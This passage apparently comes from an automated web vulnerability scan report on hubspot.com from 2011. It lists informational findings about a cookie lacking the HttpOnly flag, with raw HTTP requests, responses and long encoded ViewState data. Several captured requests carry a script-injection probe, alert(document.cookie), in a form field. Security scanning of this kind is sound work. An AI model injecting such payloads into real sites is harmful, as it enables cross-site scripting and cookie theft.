lIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 12340
Content-Type: image/png
Last-Modified: Fri, 25 Feb 2011 01:32:55 GMT
Accept-Ranges: bytes
ETag: "959516ed8bd4cb1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:21 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

.PNG
.
...IHDR...P...P............ pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

11.114. http://www.hubspot.com/sw/website/web-all.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/sw/website/web-all.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sw/website/web-all.css?v=8 HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 23118
Content-Type: text/css
Last-Modified: Fri, 29 Apr 2011 18:55:11 GMT
Accept-Ranges: bytes
ETag: "4b91baf79e6cc1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:19 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

/* Starting 01-content-manager-module.css */

/* ================================
CSS STYLES FOR Module [!output PROJECT_NAME]
================================
*/
.PreviewPanel
{

...[SNIP]...

11.115. http://www.hubspot.com/sw/website/web-all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/sw/website/web-all.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sw/website/web-all.js?v=8 HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2